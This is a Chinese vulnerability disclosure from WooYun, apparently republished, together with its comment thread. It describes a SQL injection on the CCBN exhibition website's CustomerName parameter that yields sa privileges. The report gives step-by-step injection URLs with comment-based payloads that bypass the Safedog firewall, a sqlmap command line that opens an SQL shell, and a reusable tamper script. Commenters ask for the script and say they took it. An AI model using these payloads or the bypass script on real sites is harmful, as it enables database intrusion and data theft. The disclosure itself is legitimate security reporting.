CCBN WWW主站SQL注入/sa权限（绕过安全狗/附sqlmap脚本）

2017年4月28日14:45:22评论247 views字数 250阅读0分50秒阅读模式

摘要

2016-04-13：细节已通知厂商并且等待厂商处理中
2016-04-16：厂商已经确认，细节仅向厂商公开
2016-04-26：细节向核心白帽子及相关领域专家公开
2016-05-06：细节向普通白帽子公开
2016-05-16：细节向实习白帽子公开
2016-05-31：细节向公众公开

漏洞概要关注数(73) 关注此漏洞

缺陷编号： WooYun-2016-195583

漏洞标题： CCBN WWW主站SQL注入/sa权限（绕过安全狗/附sqlmap脚本）

漏洞作者： goubuli

提交时间： 2016-04-13 09:40

公开时间： 2016-05-31 20:00

漏洞类型： SQL注射漏洞

危害等级：高

自评Rank： 15

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签：注射技巧

21人收藏

漏洞详情

披露状态：

简要描述：

习惯了，随手一个'，就有这个漏洞。。。
自定义sqlmap脚本，可sql-shell

详细说明：

中国国际广播电视信息网络展览会主站：

code 区域

http://**.**.**.**bn.tv/

介绍：http://**.**.**.**bn.tv/channels/4.html

漏洞url：

code 区域

http://**.**.**.**bn.tv/CCBN/ExhibitionOnline.aspx?TypeID=&HallID=&CustomerName=p
 参数：CustomerName可注入

遇到狗：

code 区域

http://**.**.**.**bn.tv/CCBN/ExhibitionOnline.aspx?TypeID=&HallID=&CustomerName=p%27) and 1=user--

绕过：

字段数：

code 区域

http://**.**.**.**bn.tv/CCBN/ExhibitionOnline.aspx?TypeID=&HallID=&CustomerName=p%27)/*//*/order /*//*/by/*//*/71--

然后union

code 区域

http://**.**.**.**bn.tv/CCBN/ExhibitionOnline.aspx?TypeID=&HallID=&CustomerName=p%27)/*//*/UNION/*//*/ SELECT/*//*/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71--

提示类型不匹配。。。

然后全部替换为NULL，报错

code 区域

输入字符串的格式不正确

code 区域

http://**.**.**.**bn.tv/CCBN/ExhibitionOnline.aspx?TypeID=&HallID=&CustomerName=p%27)/*//*/UNION/*//*/ SELECT/*//*/NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--

字段太多，需要去对应探测，但是有可能是多个NULL，所以直接用SQLMap去跑，需要自定sqlmap脚本

然后就有如下语句：

code 区域

sqlmap.py --batch -u "http://**.**.**.**bn.tv/CCBN/ExhibitionOnline.aspx?TypeID=&HallID=&CustomerName=p" -p CustomerName --prefix "%27)/*//*/" --suffix "--" --tamper "tamper/space2myscript.py" --current-user --dbs --sql-shell

仅做证明，未深入。。。

========================================================

space2myscript.py脚本：

code 区域

#!/usr/bin/env python
 """
 developers (goubuli)
 
 """
 import random
 import string
 
 from lib.core.enums import PRIORITY
 
 __priority__ = PRIORITY.LOW
 
 def tamper(payload, **kwargs):
     
     retVal = ""
 
     if payload:
         for i in xrange(len(payload)):
             if payload[i].isspace():
                 retVal += "/*//*/" 
             elif payload[i] == '#' or payload[i:i + 3] == '-- ':
                 retVal += payload[i:]
                 break
             else:
                 retVal += payload[i]
 
     return retVal

漏洞证明：

如上

修复方案：

程序内部对参数过滤

版权声明：转载请注明来源 goubuli@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：8

确认时间：2016-04-16 19:56

厂商回复：

CNVD确认所述情况，已经转由CNCERT下发给北京分中心，由其后续协调网站管理单位处置。

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

2016-04-13 09:42 | zzR ( 核心白帽子 | Rank:1408 漏洞数:127 | 东方红＊＊联盟欢迎你－0-)

1

看上了这个sqlmap tamper 脚本

1# 回复此人
2016-04-13 09:50 | 小苹果 ( 普通白帽子 | Rank:255 漏洞数:70 | 只要锄头挥的好，哪有洞挖不到)

1

求分享脚本

2# 回复此人
2016-04-13 09:53 | Fnut ( 普通白帽子 | Rank:112 漏洞数:28 | 大王叫我来巡山，巡完南山巡北山)

1

看上了这个sqlmap tamper 脚本

3# 回复此人
2016-04-13 10:37 | 安全狗(乌云厂商)

1

关注一下

4# 回复此人
2016-04-13 10:50 | goubuli ( 普通白帽子 | Rank:689 漏洞数:122 )

1

@安全狗这个点很早就有了，只是没修复完全

5# 回复此人
2016-04-13 12:12 | 安全狗(乌云厂商)

1

@goubuli 如果是最新版的欢迎提交给我。

6# 回复此人
2016-04-13 14:54 | 带我玩 ( 路人 | Rank:16 漏洞数:8 | 带我玩)

1

看上了这个sqlmap tamper 脚本

7# 回复此人
2016-06-02 07:25 | 达子 ( 路人 | Rank:6 漏洞数:3 | 寒冷到了极致，太阳就要光临)

0

看上了脚本

8# 回复此人
2016-06-02 08:34 | YI XUN ( 实习白帽子 | Rank:51 漏洞数:13 | 刷rank真难，为啥我看别人尼玛弱口令都能20...)

0

脚本拿走了

9# 回复此人

漏洞概要 关注数(73) 关注此漏洞

缺陷编号： WooYun-2016-195583

漏洞标题： CCBN WWW主站SQL注入/sa权限（绕过安全狗/附sqlmap脚本）

相关厂商： CCBN

漏洞作者： goubuli

提交时间： 2016-04-13 09:40

公开时间： 2016-05-31 20:00

漏洞类型： SQL注射漏洞

危害等级： 高

自评Rank： 15

漏洞状态： 已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签： 注射技巧

21人收藏

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 goubuli@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

漏洞评价(共0人评价): 登陆后才能进行评分

评价

发表评论

在线咨询

微信

漏洞概要关注数(73) 关注此漏洞

危害等级：高

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签：注射技巧

漏洞评价(共0人评价):

登陆后才能进行评分